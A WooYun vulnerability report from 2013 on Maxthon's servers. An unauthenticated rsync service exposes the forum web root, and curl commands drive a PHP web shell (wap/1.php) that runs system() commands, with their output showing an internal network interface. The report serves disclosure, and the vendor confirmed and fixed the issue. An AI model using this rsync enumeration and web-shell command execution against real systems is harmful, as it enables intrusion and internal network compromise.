当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(4) 关注此漏洞

缺陷编号: WooYun-2013-38373

漏洞标题: 某服务配置不当导致遨游数据和内网沦陷

相关厂商: 傲游

漏洞作者: 路人甲

提交时间: 2013-09-27 19:11

公开时间: 2013-11-11 19:11

漏洞类型: 系统/服务运维配置不当

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 安全意识不足 默认配置不当 rsync

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-27: 细节已通知厂商并且等待厂商处理中
2013-09-27: 厂商已经确认,细节仅向厂商公开
2013-10-07: 细节向核心白帽子及相关领域专家公开
2013-10-17: 细节向普通白帽子公开
2013-10-27: 细节向实习白帽子公开
2013-11-11: 细节向公众公开

简要描述:

一个典型的服务设置不当导致直接拿shell从而控制服务器和进行内网渗透

详细说明:

code 区域
rsync 60.28.220.78::
blog
bbs
localhost:scan root$ rsync 60.28.220.78::bbs/
drwxrwxr-x 4096 2012/09/04 05:13:03 .
-rwxrwxr-x 4303 2009/09/15 13:09:41 admincp.php
-rwxrwxr-x 8235 2009/09/15 13:24:02 ajax.php
-rwxrwxr-x 1534 2009/09/15 13:09:41 announcement.php
-rwxrwxr-x 8324 2009/09/15 13:09:41 attachment.php
lrwxrwxrwx 24 2012/09/04 05:12:51 attachments
-rw-r--r-- 2796002 2011/03/22 18:22:38 bbs-trunk.zip
-rwxrwxr-x 1953 2009/09/15 13:09:41 campaign.php
-rwxr-xr-x 4014 2012/08/14 10:54:26 config.inc.php
-rwxrwxr-x 106 2009/09/02 10:02:47 crossdomain.xml
-rwxrwxr-x 121996 2009/09/15 13:09:41 d60to70.php.tmp.bak
-rwxrwxr-x 147 2009/09/15 13:09:41 discuz_version.php
-rwxrwxr-x 8079 2009/09/15 13:09:41 eccredit.php
-rwxrwxr-x 4053 2009/09/15 13:09:41 faq.php
-rwxrwxrwx 1150 2011/03/21 17:10:27 favicon.ico
lrwxrwxrwx 21 2012/09/04 05:13:03 forumdata
-rwxrwxr-x 17463 2009/09/15 13:09:41 forumdisplay.php
-rwxrwxr-x 1260 2009/09/15 13:09:41 frame.php
-rwxrwxr-x 10032 2009/09/22 18:05:00 index.php
-rwxrwxr-x 4900 2009/09/15 13:09:41 invite.php
-rwxrwxr-x 1546 2009/09/15 13:09:41 leftmenu.php
-rwxrwxr-x 20227 2011/11/25 15:13:12 logging.php
-rwxrwxr-x 20611 2009/09/15 13:09:41 magic.php
-rwxrwxr-x 3302 2009/09/15 13:09:41 medal.php
-rwxrwxr-x 12943 2009/09/15 13:09:41 member.php
-rwxrwxr-x 37102 2009/09/15 13:09:41 memcp.php
-rwxrwxr-x 42767 2009/09/15 13:09:41 misc.php
-rwxrwxr-x 5603 2009/09/15 13:09:41 modcp.php
-rwxrwxr-x 32143 2009/11/26 18:37:32 my.php
-rwxrwxr-x 906 2009/09/15 13:09:41 plugin.php
-rwxrwxr-x 12698 2009/10/10 09:38:38 pm.php
-rwxrwxr-x 11586 2009/09/16 11:50:17 post.php
-rwxrwxr-x 3464 2009/09/15 13:09:41 redirect.php
-rwxrwxr-x 12427 2012/08/10 10:47:01 register.php
-rwxrwxr-x 3434 2009/09/15 13:09:41 relatekw.php
-rwxrwxr-x 5688 2009/09/15 13:09:41 relatethread.php
-rwxrwxr-x 8419 2009/10/10 16:43:16 reusername.php
-rwxrwxr-x 721 2009/09/02 10:02:47 robots.txt
-rwxrwxr-x 5898 2010/04/12 10:51:42 rss.php
-rwxrwxr-x 10227 2009/09/15 13:09:41 search.php
-rwxrwxr-x 2038 2009/09/15 13:09:41 seccode.php
-rwxrwxr-x 3521 2009/09/15 13:09:41 sitemap.php
-rwxrwxr-x 7688 2009/09/15 13:09:41 space.php
-rwxrwxr-x 38482 2009/10/21 13:25:32 stats.php
-rwxrwxr-x 5962 2009/09/15 13:09:41 tag.php
-rwxrwxr-x 16187 2009/09/15 13:09:41 task.php
-rwxrwxr-x 17 2009/10/23 14:42:20 test.php
-rwxrwxr-x 1044 2009/09/15 13:09:41 topic.php
-rwxrwxr-x 25242 2009/09/15 13:09:41 topicadmin.php
-rwxrwxr-x 9795 2009/09/15 13:09:41 trade.php
-rwxrwxr-x 1010 2009/09/15 13:09:41 video.php
-rwxrwxr-x 30266 2012/09/26 13:33:33 viewthread.php
drwxrwxr-x 4096 2011/03/22 18:17:44 __MACOSX
drwxrwxr-x 4096 2009/10/29 16:23:22 admin
drwxrwxr-x 4096 2009/09/27 21:45:46 api
drwxrwxr-x 4096 2009/09/27 21:45:46 archiver
drwxrwxr-x 4096 2009/09/27 16:32:05 attachments.local
drwxr-xr-x 4096 2011/03/22 18:23:18 css
drwxrwxr-x 4096 2009/09/27 21:45:46 forumdata.local
drwxrwxr-x 4096 2011/03/22 18:23:24 images
drwxrwxr-x 4096 2009/10/19 18:59:42 include
drwxrwxr-x 4096 2009/09/27 21:45:46 ipdata
drwxrwxr-x 4096 2011/05/25 14:39:12 maxthon
drwxrwxr-x 4096 2009/09/27 21:45:46 modcp
drwxrwxr-x 4096 2009/09/27 21:45:46 plugins
drwxr-xr-x 4096 2012/09/03 18:51:03 poll
drwxrwxr-x 4096 2011/03/22 18:23:30 templates
drwxrwxr-x 4096 2009/09/27 21:45:46 uc_client
drwxrwxr-x 4096 2009/09/27 21:45:46 uc_server
drwxrwxr-x 4096 2009/11/26 14:52:35 update20091128
drwxrwxr-x 4096 2013/09/26 21:35:01 wap

漏洞证明:

code 区域
curl http://60.28.220.78/wap/1.php -d 'c=system($_REQUEST[d]);&d=id'
uid=80(www) gid=501(www) groups=501(www)
localhost:scan root$ curl http://60.28.220.78/wap/1.php -d 'c=system($_REQUEST[d]);&d=ifconfig'
eth0 Link encap:Ethernet HWaddr 00:15:17:87:8E:40
inet addr:60.28.220.78 Bcast:60.28.220.127 Mask:255.255.255.192
inet6 addr: fe80::215:17ff:fe87:8e40/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2704078494 errors:0 dropped:0 overruns:0 frame:0
TX packets:2636441801 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:777004890 (741.0 MiB) TX bytes:218530086 (208.4 MiB)
Memory:b8820000-b8840000

eth1 Link encap:Ethernet HWaddr 00:15:17:87:8E:41
inet addr:192.168.0.39 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::215:17ff:fe87:8e41/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2553857922 errors:0 dropped:0 overruns:0 frame:0
TX packets:943152715 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3262742096 (3.0 GiB) TX bytes:1230432064 (1.1 GiB)
Memory:b8800000-b8820000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1405875 errors:0 dropped:0 overruns:0 frame:0
TX packets:1405875 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:112412020 (107.2 MiB) TX bytes:112412020 (107.2 MiB)

lo:0 Link encap:Local Loopback
inet addr:60.28.220.125 Mask:255.255.255.255
UP LOOPBACK RUNNING MTU:16436 Metric:1

修复方案:

不多说

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-09-27 19:56

厂商回复:

感谢提醒. 已转交开发.

最新状态:

2013-09-28:已修复.


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录